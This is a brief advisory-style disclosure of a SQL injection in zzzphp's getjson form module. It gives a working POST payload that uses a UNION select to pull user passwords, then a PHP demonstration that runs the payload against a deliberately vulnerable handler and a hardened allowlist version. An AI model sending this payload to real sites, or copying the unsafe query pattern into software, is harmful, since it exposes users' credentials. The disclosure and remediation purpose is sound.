There is a SQL injection vulnerability in the latest version of zzzphp that lets an attacker select users' passwords.

Vulnerable URL: http://127.0.0.1/zzzphp/form/index.php?module=getjson
Payload: table=gbook&where[]=1=1 union select password from zzz_user&col=1
Submit the payload as a POST request.
The password then appears in the response.
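
The class of bug behind this request, next to a hardened counterpart, as an added example that is not zzzphp source code. The zzz_ table prefix on gbook, the gbook columns, the function names, the way the handler uses table/where/col, and the sample rows are all assumptions made for the demonstration.

```php
<?php
// Added illustration, NOT zzzphp source. The zzz_ prefix on gbook, the gbook
// columns and the handler logic are assumptions; sample rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE zzz_gbook (id INTEGER, content TEXT)");
$db->exec("CREATE TABLE zzz_user (id INTEGER, password TEXT)");
$db->exec("INSERT INTO zzz_gbook VALUES (1, 'hello')");
$db->exec("INSERT INTO zzz_user VALUES (1, 'constructed-password-hash')");

// Assumed vulnerable pattern: request values are pasted into the SQL text.
function getjson_unsafe(PDO $db, array $post): array {
    $where = implode(' AND ', (array)($post['where'] ?? ['1=1']));
    $sql = "SELECT {$post['col']} FROM zzz_{$post['table']} WHERE $where";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: identifiers come from an allowlist, values are bound parameters.
const ALLOWED = ['gbook' => ['id', 'content']];
function getjson_safe(PDO $db, array $post): array {
    $table = $post['table'] ?? '';
    $col = $post['col'] ?? '';
    if (!is_string($table) || !array_key_exists($table, ALLOWED)
        || !in_array($col, ALLOWED[$table], true)) {
        throw new InvalidArgumentException('table or col not allowed');
    }
    $clauses = []; $params = [];
    foreach ((array)($post['where'] ?? []) as $field => $value) {
        // where[] sends integer keys, so raw SQL fragments fail this check.
        if (!in_array($field, ALLOWED[$table], true) || !is_scalar($value)) {
            throw new InvalidArgumentException('where field not allowed');
        }
        $clauses[] = "$field = ?";
        $params[] = $value;
    }
    $sql = "SELECT $col FROM zzz_$table" . ($clauses ? ' WHERE ' . implode(' AND ', $clauses) : '');
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The request from the page, as PHP would parse it into $_POST.
$attack = ['table' => 'gbook', 'col' => '1',
           'where' => ['1=1 union select password from zzz_user']];
var_dump(getjson_unsafe($db, $attack));
try {
    getjson_safe($db, $attack);
} catch (InvalidArgumentException $e) { echo "rejected: ", $e->getMessage(), "\n"; }
var_dump(getjson_safe($db, ['table' => 'gbook', 'col' => 'content', 'where' => ['id' => 1]]));
```

The hardened handler accepts only `where[field]=value` pairs, so a caller can no longer supply SQL syntax in any of the three parameters.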
